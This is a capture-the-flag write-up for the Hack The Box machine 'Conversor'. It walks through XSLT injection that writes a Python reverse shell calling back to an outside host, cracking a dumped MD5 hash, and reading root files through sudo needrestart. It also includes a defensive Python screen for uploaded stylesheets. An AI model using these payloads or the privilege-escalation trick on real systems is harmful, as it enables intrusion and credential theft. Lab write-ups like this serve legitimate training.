# Hack The Box - Conversor Writeup
Writeup for the box Conversor in Hack The Box.
## Box Info
| Name | OS | Difficulty |
|:--------- | ----- |:---------- |
| Conversor | Linux | Easy |
## Recon
### Nmap
```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor]
└─$ sudo nmap 10.10.11.92 -oA nmap/initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 14:29 CST
Nmap scan report for 10.10.11.92
Host is up (0.99s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
```
```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor]
└─$ sudo nmap 10.10.11.92 -p22,80 -sC -sV -oA nmap/conversor
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 14:33 CST
Nmap scan report for 10.10.11.92
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_ 256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://conversor.htb/
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.79 seconds
```
Add the domain to the hosts file:
```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor]
└─$ echo "\n10.10.11.92 conversor.htb" | sudo tee -a /etc/hosts
10.10.11.92 conversor.htb
```
### Web Service - Port 80
Visiting the site shows a login page:

The home page lets you upload an XML file and an XSLT file to convert nmap scan results into HTML:

The About page lets you download the source code:

## Shell as www-data
Looking through the source code, `install.md` indicates that the site likely runs every Python script under `/scripts` on a schedule:
```markdown
If you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your /etc/crontab.
"""
* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done
"""
```
And in `app.py` we can see that the program parses the uploaded XSLT file with no protection against XSLT injection (the hardened `XMLParser` is applied only to the XML input, not to the stylesheet):
```python
<SNIP>
from lxml import etree
xml_path = os.path.join(UPLOAD_FOLDER, xml_file.filename)
xslt_path = os.path.join(UPLOAD_FOLDER, xslt_file.filename)
xml_file.save(xml_path)
xslt_file.save(xslt_path)
try:
    # The XML input is parsed with entities, DTDs and network access disabled...
    parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False)
    xml_tree = etree.parse(xml_path, parser)
    # ...but the user-supplied stylesheet is parsed with default settings.
    xslt_tree = etree.parse(xslt_path)
<SNIP>
```
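As an added defensive example (not code from the box or its `app.py`), the pre-screen below uses only the Python standard library to reject an uploaded stylesheet that declares EXSLT or any other non-XSLT namespace, sets `extension-element-prefixes`, pulls in `xsl:include`/`xsl:import`, or calls `document()`/`unparsed-text()`; the two sample stylesheets are constructed. In lxml itself the transform should additionally be built with `etree.XSLT(xslt_tree, access_control=etree.XSLTAccessControl.DENY_ALL)`, so that file writes are refused even if a stylesheet slips past the screen.

```python
import io
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
# Namespaces a benign nmap-to-HTML stylesheet needs; anything else (EXSLT,
# vendor extensions) is rejected before lxml ever sees the file.
ALLOWED_NS = {XSL_NS, "http://www.w3.org/1999/xhtml"}
# XSLT elements that load other resources at transform time.
BLOCKED_XSL_ELEMENTS = {"include", "import"}
# XPath functions that read files or URLs from inside the stylesheet.
BLOCKED_XPATH = re.compile(r"\b(document|unparsed-text)\s*\(")

def xslt_policy_violations(data: bytes) -> list:
    """Return the reasons an uploaded stylesheet must be rejected ([] = accept)."""
    problems = []
    try:
        for event, payload in ET.iterparse(io.BytesIO(data), events=("start-ns", "start")):
            if event == "start-ns":
                prefix, uri = payload
                if uri not in ALLOWED_NS:
                    problems.append(f"namespace not allowed: {prefix or '(default)'}={uri}")
                continue
            elem = payload
            ns, _, local = elem.tag.rpartition("}")
            if ns == "{" + XSL_NS and local in BLOCKED_XSL_ELEMENTS:
                problems.append(f"xsl:{local} is not allowed")
            if elem.get("extension-element-prefixes") is not None:
                problems.append("extension-element-prefixes declared")
            for attr in ("select", "test", "match"):
                value = elem.get(attr, "")
                if BLOCKED_XPATH.search(value):
                    problems.append(f"{attr}='{value}' reads a file or URL")
    except ET.ParseError as exc:
        problems.append(f"not well-formed XML: {exc}")
    return problems

# Constructed samples (not from the box): a harmless stylesheet, and one that
# declares the EXSLT namespace whose document element writes files.
BENIGN_XSLT = b"""<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><html><body><xsl:value-of select="//host/@ip"/></body></html></xsl:template>
</xsl:stylesheet>"""
SUSPICIOUS_XSLT = b"""<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
  <xsl:include href="http://example.invalid/extra.xsl"/>
  <xsl:template match="/"><exsl:document href="/tmp/x" method="text">x</exsl:document></xsl:template>
</xsl:stylesheet>"""
```

Run `xslt_policy_violations()` on each upload before `etree.parse()`; a non-empty list means the request should be rejected and logged.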
Try an XSLT injection:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="html" indent="yes"/>
  <xsl:template match="/">
    <html>
      <body>
        <br/>Version: <xsl:value-of select="system-property('xsl:version')"/>
        <br/>Vendor: <xsl:value-of select="system-property('xsl:vendor')"/>
        <br/>Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')"/>
      </body>
    </html>
  </xsl:template>
</xsl:stylesheet>
```

Use the file-write method from PayloadsAllTheThings (the Python lines inside `exploit:document` stay flush left so the written script has no leading indentation):
[PayloadsAllTheThings: XSLT Injection - Write files with EXSLT extension](https://swisskyrepo.github.io/PayloadsAllTheThings/XSLT%20Injection/?source=post_page-----7d6ff7548746---------------------------------------#write-files-with-exslt-extension)
```xml
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exploit="http://exslt.org/common"
    extension-element-prefixes="exploit"
    version="1.0">
  <xsl:template match="/">
    <exploit:document href="/var/www/conversor.htb/scripts/exploit.py" method="text">
import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.3",9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
    </exploit:document>
  </xsl:template>
</xsl:stylesheet>
```
Then, once the cron job has run, we get a shell:
```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.92] 42296
www-data@conversor:~$
```
## Shell as fismathack
```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor/source_code]
└─$ tree
.
├── app.py
├── app.wsgi
├── install.md
├── instance
│ └── users.db
```
From the source code we know there is a `users.db` under `instance/`; let's look at what it contains:
```bash
www-data@conversor:~/conversor.htb$ sqlite3 instance/users.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .tables
files users
sqlite> select * from users;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec
```
Crack the password hash:
```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor/source_code]
└─$ hashcat -m 0 5b5c3ac3a1c897c94caad48e6c71fdec /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
5b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm
```
Then we can log in over SSH:
```bash
┌──(parallels㉿kali)-[~/Documents/Hack The Box/Conversor/source_code]
└─$ ssh fismathack@10.10.11.92
<SNIP>
fismathack@conversor:~$
```
### user.txt
```bash
fismathack@conversor:~$ cat user.txt
e954fe75************************
```
## Shell as root
Check the sudo privileges:
```bash
fismathack@conversor:~$ sudo -l
Matching Defaults entries for fismathack on conversor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User fismathack may run the following commands on conversor:
(ALL : ALL) NOPASSWD: /usr/sbin/needrestart
```
Look at the `needrestart` help output:
```bash
fismathack@conversor:~$ needrestart --help
needrestart 3.7 - Restart daemons after library updates.
<SNIP>
Usage:
needrestart [-vn] [-c <cfg>] [-r <mode>] [-f <fe>] [-u <ui>] [-(b|p|o)] [-klw]
-v be more verbose
-q be quiet
-m <mode> set detail level
e (e)asy mode
a (a)dvanced mode
-n set default answer to 'no'
-c <cfg> config filename
<SNIP>
```
Passing an arbitrary file as the config file shows that `needrestart` prints the file's contents when it fails to parse it:
```bash
fismathack@conversor:~$ needrestart -c user.txt
Error parsing user.txt: Bareword "e954fe75************************" not allowed while "strict subs" in use at (eval 14) line 1.
```
### root.txt
```bash
fismathack@conversor:~$ sudo needrestart -c /root/root.txt
Error parsing /root/root.txt: Bareword "f091c672************************" not allowed while "strict subs" in use at (eval 14) line 1.
```